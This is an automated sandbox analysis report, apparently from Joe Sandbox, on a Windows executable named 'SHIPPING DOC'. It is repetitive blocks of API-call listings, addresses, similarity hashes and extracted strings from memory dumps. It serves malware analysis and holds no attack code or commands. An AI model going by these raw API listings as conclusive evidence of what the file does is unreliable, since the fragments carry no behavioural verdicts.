                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                                                                      • String ID: ThumbnailClass
                                                                                                                      • API String ID: 4136854206-1241985126
                                                                                                                      • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                      • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                                                                      • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                      • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                                                                      APIs
                                                                                                                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                                                                      • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                                                                      • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                                                                      • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                                                                      • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                                      • String ID: 2
                                                                                                                      • API String ID: 1331449709-450215437
                                                                                                                      • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                                      • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                                                                      • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                                      • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                      • __swprintf.LIBCMT ref: 00460915
                                                                                                                      • __swprintf.LIBCMT ref: 0046092D
                                                                                                                      • _wprintf.LIBCMT ref: 004609E1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                                                                      • API String ID: 3054410614-2561132961
                                                                                                                      • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                                      • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                                                                      • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                                      • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                                                      • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                                                      • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                      • API String ID: 600699880-22481851
                                                                                                                      • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                      • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                                                      • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                      • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DestroyWindow
                                                                                                                      • String ID: static
                                                                                                                      • API String ID: 3375834691-2160076837
                                                                                                                      • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                      • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                                                      • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                      • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                                                      • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                                      • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                                                      • API String ID: 2907320926-3566645568
                                                                                                                      • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                      • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                                                      • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                      • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                      • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                                                                      • DeleteObject.GDI32(00740000), ref: 00470A04
                                                                                                                      • DestroyIcon.USER32(006D0065), ref: 00470A1C
                                                                                                                      • DeleteObject.GDI32(893CB402), ref: 00470A34
                                                                                                                      • DestroyWindow.USER32(006F0043), ref: 00470A4C
                                                                                                                      • DestroyIcon.USER32(?), ref: 00470A73
                                                                                                                      • DestroyIcon.USER32(?), ref: 00470A81
                                                                                                                      • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1237572874-0
                                                                                                                      • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                      • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                                                                      • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                      • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                                                                      APIs
                                                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                                                      • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                                                      • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                                                      • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2706829360-0
                                                                                                                      • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                                      • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                                                                      • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                                      • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?), ref: 0044480E
                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                                                                      • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                                                                      • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                                                                      • GetKeyState.USER32(00000011), ref: 00444903
                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                                                                      • GetKeyState.USER32(00000012), ref: 0044492D
                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                                                                      • GetKeyState.USER32(0000005B), ref: 00444958
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 541375521-0
                                                                                                                      • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                      • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                                                                      • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                      • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3413494760-0
                                                                                                                      • Opcode ID: 6d788ec2be1997d9cec64eaa256864158e09ad3f6105efb05e468561ef8a9f6c
                                                                                                                      • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                                                      • Opcode Fuzzy Hash: 6d788ec2be1997d9cec64eaa256864158e09ad3f6105efb05e468561ef8a9f6c
                                                                                                                      • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                                                      • String ID: AU3_FreeVar
                                                                                                                      • API String ID: 2634073740-771828931
                                                                                                                      • Opcode ID: 0205934085a73e828eb836af54efcf0b2f745960cf3f8f52847b126bcd632882
                                                                                                                      • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                                                                      • Opcode Fuzzy Hash: 0205934085a73e828eb836af54efcf0b2f745960cf3f8f52847b126bcd632882
                                                                                                                      • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32 ref: 0046C63A
                                                                                                                      • CoUninitialize.OLE32 ref: 0046C645
                                                                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                        • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                                        • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                                                      • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                                                      • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                                                      • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                      • API String ID: 2294789929-1287834457
                                                                                                                      • Opcode ID: 8665205133a3f3d83065b0d9f42e266eef00d51d9f24292ab734099309a65fda
                                                                                                                      • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                                                      • Opcode Fuzzy Hash: 8665205133a3f3d83065b0d9f42e266eef00d51d9f24292ab734099309a65fda
                                                                                                                      • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                        • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                        • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                        • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                      • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                                                      • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                                                      • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                                                      • ReleaseCapture.USER32 ref: 0047116F
                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
